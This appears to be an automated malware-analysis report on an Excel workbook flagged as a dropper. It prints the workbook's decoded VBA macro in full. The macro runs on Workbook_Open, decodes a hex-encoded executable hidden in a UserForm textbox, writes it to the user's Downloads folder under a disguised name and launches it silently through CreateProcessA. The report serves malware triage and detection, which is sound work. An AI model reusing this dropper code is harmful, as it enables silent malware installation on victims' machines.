Verdict: MALICIOUS
Risk Score: 216
Heuristics: 7
- ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Embedded PE decoded from VBA/UserForm payload string (critical, OLE_VBA_EMBEDDED_PE_DROPPER): The VBA macro carries a Windows executable encoded as a base64 or hex string — split across macro string literals, or stored in a UserForm control's text (e.g. TextBox1.Text) — and rebuilds it at run time, typically writing it to %ProgramData%/%TEMP% (ADODB.Stream / binary Put) and executing it via WScript.Shell or cmd.exe. The payload is embedded in the document, not downloaded, and never appears as a contiguous executable on disk, so the URL recoverers and the raw embedded-EXE scan miss it. The analyzer decoded it into a valid PE (MZ + DOS stub + PE header); a benign document does not carry an executable in its macro/form strings. The dropped payload has been carved for full extracted-file analysis.
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched line in script: `Private Sub Workbook_Open()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `userProfile = Environ("USERPROFILE")`
- Reference to CreateProcess API (high, SC_STR_CREATEPROCESS)
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4001 bytes | 7aff7be05b483d522bc9ff57a3e19bafcb6e9b1cef5faa59af0fe62d9c65438b |
Preview of macros.bas (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 3, 0, MSForms, TextBox"
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare PtrSafe Function CreateADirect Lib "kernel32" Alias "CreateProcessA" ( _
ByVal lpApplicationName As String, _
ByVal lpCommandLine As String, _
ByVal lpProcessAttributes As LongPtr, _
ByVal lpThreadAttributes As LongPtr, _
ByVal bInheritHandles As Long, _
ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As LongPtr, _
ByVal lpCurrentDirectory As String, _
ByRef lpStartupInfo As STARTUPINFOA, _
ByRef lpProcessInformation As PROCESS_INFORMATIONA) As Long
Private Declare PtrSafe Function CloseDirect Lib "kernel32" Alias "CloseHandle" ( _
ByVal hObject As LongPtr) As Long
Private Type STARTUPINFOA
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As LongPtr
hStdInput As LongPtr
hStdOutput As LongPtr
hStdError As LongPtr
End Type
Private Type PROCESS_INFORMATIONA
hProcess As LongPtr
hThread As LongPtr
dwProcessId As Long
dwThreadId As Long
End Type
Private Const CREATE_NO_WINDOW As Long = &H8000000
Sub REx(ByVal path As String)
Dim tsi As STARTUPINFOA
Dim tpi As PROCESS_INFORMATIONA
Dim ret As Long
tsi.cb = Len(tsi)
ret = CreateADirect(path, vbNullString, 0, 0, 0, CREATE_NO_WINDOW, 0, vbNullString, tsi, tpi)
If ret <> 0 Then
CloseDirect tpi.hProcess
CloseDirect tpi.hThread
' Else
' MsgBox "Failed to start process. Error: " & Err.LastDllError
End If
End Sub
Function Dechex(ByVal hstring As String) As Byte()
Dim length As Long
Dim i As Long
Dim result() As Byte
hstring = Replace(hstring, " ", "")
hstring = Replace(hstring, ":", "")
hstring = Replace(hstring, "-", "")
If Len(hstring) Mod 2 <> 0 Then
Err.Raise 5, "Dechex", "Hex string must have even length"
End If
length = Len(hstring) \ 2
ReDim result(0 To length - 1)
For i = 0 To length - 1
result(i) = Val("&H" & Mid(hstring, i * 2 + 1, 2))
Next i
Dechex = result
End Function
Private Sub Workbook_Open()
On Error GoTo ErrorHandler
Dim pathfile As String
Dim bytesapp() As Byte
Dim fileNum As Integer
userProfile = Environ("USERPROFILE")
pathfile = userProfile & "\Downloads\pic.LOG"
bytesapp = Dechex(UserForm1.box5.Text)
fileNum = FreeFile
Open pathfile For Binary Access Write As #fileNum
Put #fileNum, 1, bytesapp
Close #fileNum
REx pathfile
Exit Sub
ErrorHandler:
' MsgBox "Error in Document_Open: " & Err.Description
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{89A51452-A305-4E63-8C47-CECDA3AD38C5}{0CE53D50-CA94-4F47-BF62-A11B6A75EF01}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vba_embedded_payload.bin | vba-embedded-pe | decoded from a hex/base64 payload string in a VBA UserForm control or macro literal | 223232 bytes | 1b9e6fe4b03285b2e768c57e320d84323ac9167598395918d56a12e568b0009a |

Detection (vba_embedded_payload.bin):
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 shell/COM execution token(s). Carved artifact contains 2 long base64-like blob(s).